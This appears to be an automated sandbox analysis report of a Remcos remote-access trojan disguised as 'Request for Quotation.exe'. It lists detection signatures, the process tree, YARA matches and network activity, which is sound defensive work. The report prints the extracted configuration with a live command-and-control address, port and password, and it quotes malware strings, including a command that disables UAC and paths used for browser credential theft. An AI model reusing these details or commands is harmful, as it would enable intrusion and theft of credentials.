Analysis Report Request for Quotation.exe

Overview

General Information

Sample Name: Request for Quotation.exe
Analysis ID: 356426
MD5: ae4bd6c5a7eaa50704d43d6054fc5dbd
SHA1: ab597cfc0433999f2032c56fe2c9e17081bcab46
SHA256: 8e51354c8b2f461ab0cfb92409bc45bf4e06ae244080513e2d6224dc22f47771
Tags: RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Startup

  • System is w10x64
  • Request for Quotation.exe (PID: 7164 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
    • Request for Quotation.exe (PID: 612 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 6188 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 5692 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "103.89.88.238:4299:s%qDr", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "excel.exe", "Startup value": "excel", "Hide file": "Disable", "Mutex": "excel-8OHAVR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp | Remcos_1 | Remcos Payload | kevoreilly
    • 0x16510:$name: Remcos
    • 0x16888:$name: Remcos
    • 0x16de0:$name: Remcos
    • 0x16e33:$name: Remcos
    • 0x15674:$time: %02i:%02i:%02i:%03i
    • 0x156fc:$time: %02i:%02i:%02i:%03i
    • 0x16be4:$time: %02i:%02i:%02i:%03i
    • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp | REMCOS_RAT_variants | unknown | unknown
    • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
    • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x159e0:$str_b2: Executing file:
    • 0x16798:$str_b3: GetDirectListeningPort
    • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x16534:$str_b5: licence_code.txt
    • 0x1649c:$str_b6: \restart.vbs
    • 0x163c0:$str_b8: \uninstall.vbs
    • 0x1596c:$str_b9: Downloaded file:
    • 0x15998:$str_b10: Downloading file:
    • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
    • 0x159fc:$str_b12: Failed to upload file:
    • 0x167d8:$str_b13: StartForward
    • 0x167bc:$str_b14: StopForward
    • 0x16330:$str_b15: fso.DeleteFile "
    • 0x16394:$str_b16: On Error Resume Next
    • 0x162fc:$str_b17: fso.DeleteFolder "
    • 0x15a14:$str_b18: Uploaded file:
    00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
    00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp | Remcos_1 | Remcos Payload | kevoreilly
      • 0x16510:$name: Remcos
      • 0x16888:$name: Remcos
      • 0x16de0:$name: Remcos
      • 0x16e33:$name: Remcos
      • 0x15674:$time: %02i:%02i:%02i:%03i
      • 0x156fc:$time: %02i:%02i:%02i:%03i
      • 0x16be4:$time: %02i:%02i:%02i:%03i
      • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.1.Request for Quotation.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
      1.1.Request for Quotation.exe.400000.0.raw.unpack | Remcos_1 | Remcos Payload | kevoreilly
        • 0x16510:$name: Remcos
        • 0x16888:$name: Remcos
        • 0x16de0:$name: Remcos
        • 0x16e33:$name: Remcos
        • 0x15674:$time: %02i:%02i:%02i:%03i
        • 0x156fc:$time: %02i:%02i:%02i:%03i
        • 0x16be4:$time: %02i:%02i:%02i:%03i
        • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
      1.1.Request for Quotation.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
        • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
        • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x159e0:$str_b2: Executing file:
        • 0x16798:$str_b3: GetDirectListeningPort
        • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x16534:$str_b5: licence_code.txt
        • 0x1649c:$str_b6: \restart.vbs
        • 0x163c0:$str_b8: \uninstall.vbs
        • 0x1596c:$str_b9: Downloaded file:
        • 0x15998:$str_b10: Downloading file:
        • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
        • 0x159fc:$str_b12: Failed to upload file:
        • 0x167d8:$str_b13: StartForward
        • 0x167bc:$str_b14: StopForward
        • 0x16330:$str_b15: fso.DeleteFile "
        • 0x16394:$str_b16: On Error Resume Next
        • 0x162fc:$str_b17: fso.DeleteFolder "
        • 0x15a14:$str_b18: Uploaded file:
        1.1.Request for Quotation.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
        1.1.Request for Quotation.exe.400000.0.unpack | Remcos_1 | Remcos Payload | kevoreilly
          • 0x16510:$name: Remcos
          • 0x16888:$name: Remcos
          • 0x16de0:$name: Remcos
          • 0x16e33:$name: Remcos
          • 0x15674:$time: %02i:%02i:%02i:%03i
          • 0x156fc:$time: %02i:%02i:%02i:%03i
          • 0x16be4:$time: %02i:%02i:%02i:%03i
          • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.89.88.238:4299:s%qDr", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "excel.exe", "Startup value": "excel", "Hide file": "Disable", "Mutex": "excel-8OHAVR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0"}
          Multi AV Scanner detection for submitted file
          Source: Request for Quotation.exe, Virustotal: Detection: 27%
          Source: Request for Quotation.exe, ReversingLabs: Detection: 21%
          Yara detected Remcos RAT
          Source: Yara match, File source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara match, File source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara match, File source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: Request for Quotation.exe, Joe Sandbox ML: detected
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, Avira: Label: BDS/Backdoor.Gen
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Code function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423

          Compliance:

          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Unpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack
          Uses 32bit PE files
          Source: Request for Quotation.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NX
          Source: Request for Quotation.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbols
          Source: Binary string: wntdll.pdbUGP source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Code function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\Request for Quotation.exe, Code function: 1_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_2_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits
@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_1_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@
@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,#23,#4,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits
@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_s1_1_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_1_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_1_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 4_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407898
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor URLs: 103.89.88.238
          Source: global traffic TCP traffic: 192.168.2.4:49726 -> 103.89.88.238:4299
          Source: Joe Sandbox View IP Address: 103.89.88.238
          Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: unknown TCP traffic detected without corresponding DNS query: 103.89.88.238
